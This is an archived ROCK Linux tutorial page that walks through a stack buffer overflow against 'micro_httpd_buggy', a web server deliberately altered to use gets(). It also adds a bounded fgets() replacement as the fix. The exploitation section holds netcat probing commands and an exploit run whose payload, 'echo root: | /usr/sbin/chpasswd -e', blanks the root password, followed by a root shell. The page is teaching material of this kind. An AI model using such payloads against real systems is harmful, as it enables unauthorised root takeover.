

The ROCK Linux project was discontinued in 2010. Here is the old data, kept for the historical record!


A realistic example (micro_httpd_buggy)

Note on micro_httpd

The original micro_httpd is not exploitable this way. I've replaced the fgets() call used by micro_httpd with a gets() call.
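As an added example (not micro_httpd's code, and not from the original page), this is the shape of the bounded read that the swapped-out fgets() call provides: the request line is read into a fixed buffer of an assumed size, a line that does not fit is drained and rejected rather than written past the buffer, and the helper line_length_of() feeds constructed request strings through it for testing.

```c
#define _POSIX_C_SOURCE 200809L   /* fmemopen() for the demo helper */
#include <stdio.h>
#include <string.h>

#define REQ_LINE_MAX 128          /* assumed size, not micro_httpd's actual buffer */

/* Bounded replacement for the gets() read: stores at most size-1 bytes,
 * strips "\n" or "\r\n", returns the length. -1: EOF before any data.
 * -2: line longer than the buffer; the rest of that line is drained so
 * it cannot be reparsed as a second request. */
int read_request_line(FILE *in, char *buf, size_t size)
{
    if (fgets(buf, (int)size, in) == NULL)
        return -1;
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[--len] = '\0';
    } else {                      /* no newline: exactly full, EOF, or overlong */
        int c = fgetc(in);
        if (c != EOF && c != '\n') {
            while (c != EOF && c != '\n')
                c = fgetc(in);
            buf[0] = '\0';
            return -2;
        }
    }
    if (len > 0 && buf[len - 1] == '\r')
        buf[--len] = '\0';
    return (int)len;
}

/* Demo/test helper: feed a constructed request string through
 * read_request_line() using a buffer of the given size (capped). */
char last_line[REQ_LINE_MAX];
int line_length_of(const char *input, size_t size)
{
    if (size > sizeof last_line)
        size = sizeof last_line;
    FILE *f = fmemopen((void *)input, strlen(input), "r");
    if (f == NULL)
        return -3;
    int r = read_request_line(f, last_line, size);
    fclose(f);
    return r;
}
```

A server using this returns an error response when read_request_line() reports -2, so an overlong request line like the ones sent below is refused instead of overwriting the stack frame.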

Exploiting it

First let's see how big the input buffer in micro_httpd_buggy is:
duesentrieb:~$ printf '%-*s\n\n' 1000 'GET / HTTP/1.0' | ./netcat localhost 80
HTTP/1.0 200 Ok ...
duesentrieb:~$ printf '%-*s\n\n' 10000 'GET / HTTP/1.0' | ./netcat localhost 80
HTTP/1.0 200 Ok ...
duesentrieb:~$ printf '%-*s\n\n' 20000 'GET / HTTP/1.0' | ./netcat localhost 80
[ ... ]
duesentrieb:~$ printf '%-*s\n\n' 10116 'GET / HTTP/1.0' | ./netcat localhost 80
HTTP/1.0 200 Ok ...
duesentrieb:~$ printf '%-*s\n\n' 10120 'GET / HTTP/1.0' | ./netcat localhost 80

Ok - so let's exploit it:

duesentrieb:~$ ./prog2b 5000 6000 5000 0xbffffabc 8000 \
               'echo root: | /usr/sbin/chpasswd -e' | \
               ./netcat localhost 80
duesentrieb:~$ su -
Password:
Hmm - that didn't work. Probably the 10120 bytes we found is not the size of the buffer but the distance to the end of the stack, so the process segfaults before the function can return and execute our code. In that case the output is generated before the function returns, which is why we still see a response even when we write past the end of our stack frame. That's bad, because now we don't know how big the buffer is; all we know is that it is smaller than 10120 bytes. Let's try it with a value suitable for a buffer of 10000 bytes:
duesentrieb:~$ ./prog2b 5000 5000 5000 0xbffffabc 8000 \
               'echo root: | /usr/sbin/chpasswd -e' | \
               ./netcat localhost 80
duesentrieb:~$ su -
duesentrieb:~# 
Now we are root ...